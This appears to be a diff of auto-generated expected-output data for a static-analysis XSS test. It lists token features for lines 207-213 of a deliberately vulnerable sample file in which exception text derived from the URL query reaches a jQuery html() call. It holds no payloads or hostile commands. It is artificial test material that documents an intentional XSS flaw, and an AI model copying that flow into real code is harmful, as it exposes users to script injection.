enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:8:207:12 | parse | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:207:8:207:12 | parse | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:207:14:207:16 | foo | CalleeFlexibleAccessPath | JSON.parse | | autogenerated/Xss/ExceptionXss/exception-xss.js:207:14:207:16 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:207:14:207:16 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19499,6 +131541,31 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:207:14:207:16 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:207:14:207:16 | foo | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:207:14:207:16 | foo | receiverName | JSON | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:7 | /bla/ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:7 | /bla/ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:7 | /bla/ | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:7 | /bla/ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:7 | /bla/ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:12 | /bla/.test | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:12 | /bla/.test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:12 | /bla/.test | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:12 | /bla/.test | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:12 | /bla/.test | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:17 | /bla/.test(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:17 | /bla/.test(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:17 | /bla/.test(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:17 | /bla/.test(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:17 | /bla/.test(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:17 | exceptional return of /bla/.test(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:17 | exceptional return of /bla/.test(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:17 | exceptional return of /bla/.test(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:17 | exceptional return of /bla/.test(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:3:208:17 | exceptional return of /bla/.test(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:9:208:12 | test | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:9:208:12 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:9:208:12 | test | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:9:208:12 | test | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:208:9:208:12 | test | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:208:14:208:16 | foo | CalleeFlexibleAccessPath | ?.test | | autogenerated/Xss/ExceptionXss/exception-xss.js:208:14:208:16 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:208:14:208:16 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19506,6 +131573,31 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:208:14:208:16 | foo | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:208:14:208:16 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:208:14:208:16 | foo | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:9 | console | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:9 | console | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:9 | console | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:9 | console | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:9 | console | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:13 | console.log | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:13 | console.log | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:13 | console.log | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:13 | console.log | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:13 | console.log | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:18 | console.log(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:18 | console.log(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:18 | console.log(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:18 | console.log(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:18 | console.log(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:18 | exceptional return of console.log(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:18 | exceptional return of console.log(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:18 | exceptional return of console.log(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:18 | exceptional return of console.log(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:3:209:18 | exceptional return of console.log(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:11:209:13 | log | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:11:209:13 | log | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:11:209:13 | log | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:11:209:13 | log | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:209:11:209:13 | log | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:209:15:209:17 | foo | CalleeFlexibleAccessPath | console.log | | autogenerated/Xss/ExceptionXss/exception-xss.js:209:15:209:17 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:209:15:209:17 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19514,6 +131606,31 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:209:15:209:17 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:209:15:209:17 | foo | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:209:15:209:17 | foo | receiverName | console | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:5 | log | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:5 | log | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:5 | log | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:5 | log | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:5 | log | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:10 | log.info | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:10 | log.info | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:10 | log.info | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:10 | log.info | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:10 | log.info | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:15 | exceptional return of log.info(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:15 | exceptional return of log.info(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:15 | exceptional return of log.info(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:15 | exceptional return of log.info(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:15 | exceptional return of log.info(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:15 | log.info(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:15 | log.info(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:15 | log.info(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:15 | log.info(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:3:210:15 | log.info(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:7:210:10 | info | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:7:210:10 | info | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:7:210:10 | info | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:7:210:10 | info | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:210:7:210:10 | info | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:210:12:210:14 | foo | CalleeFlexibleAccessPath | log.info | | autogenerated/Xss/ExceptionXss/exception-xss.js:210:12:210:14 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:210:12:210:14 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19522,6 +131639,31 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:210:12:210:14 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:210:12:210:14 | foo | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:210:12:210:14 | foo | receiverName | log | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:14 | localStorage | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:14 | localStorage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:14 | localStorage | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:14 | localStorage | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:14 | localStorage | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:22 | localStorage.setItem | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:22 | localStorage.setItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:22 | localStorage.setItem | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:22 | localStorage.setItem | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:22 | localStorage.setItem | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:27 | exceptional return of localSt ... em(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:27 | exceptional return of localSt ... em(foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:27 | exceptional return of localSt ... em(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:27 | exceptional return of localSt ... em(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:27 | exceptional return of localSt ... em(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:27 | localSt ... em(foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:27 | localSt ... em(foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:27 | localSt ... em(foo) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:27 | localSt ... em(foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:3:211:27 | localSt ... em(foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:16:211:22 | setItem | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:16:211:22 | setItem | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:16:211:22 | setItem | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:16:211:22 | setItem | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:211:16:211:22 | setItem | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:211:24:211:26 | foo | CalleeFlexibleAccessPath | localStorage.setItem | | autogenerated/Xss/ExceptionXss/exception-xss.js:211:24:211:26 | foo | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:211:24:211:26 | foo | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19530,6 +131672,46 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:211:24:211:26 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:211:24:211:26 | foo | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:211:24:211:26 | foo | receiverName | localStorage | +| autogenerated/Xss/ExceptionXss/exception-xss.js:212:11:212:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:212:11:212:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:212:11:212:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:212:11:212:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:212:11:212:11 | e | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:212:11:212:11 | e | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:212:11:212:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:212:11:212:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:212:11:212:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:212:11:212:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:3 | $ | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:11 | $('myId') | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:16 | $('myId').html | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:19 | $('myId').html(e) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:3:213:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:213:5:213:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:213:5:213:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:213:5:213:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19537,6 +131719,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:213:5:213:10 | 'myId' | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:213:5:213:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:213:5:213:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:13:213:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:13:213:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:13:213:16 | html | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:13:213:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:213:13:213:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:213:18:213:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:213:18:213:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:213:18:213:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -19544,12 +131731,121 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:213:18:213:18 | e | enclosingFunctionBody | foo document location search Object assign foo foo _ pick foo foo foo foo join join $ val foo JSON parse foo /bla/ test foo console log foo log info foo localStorage setItem foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:213:18:213:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:213:18:213:18 | e | fileImports | express fs 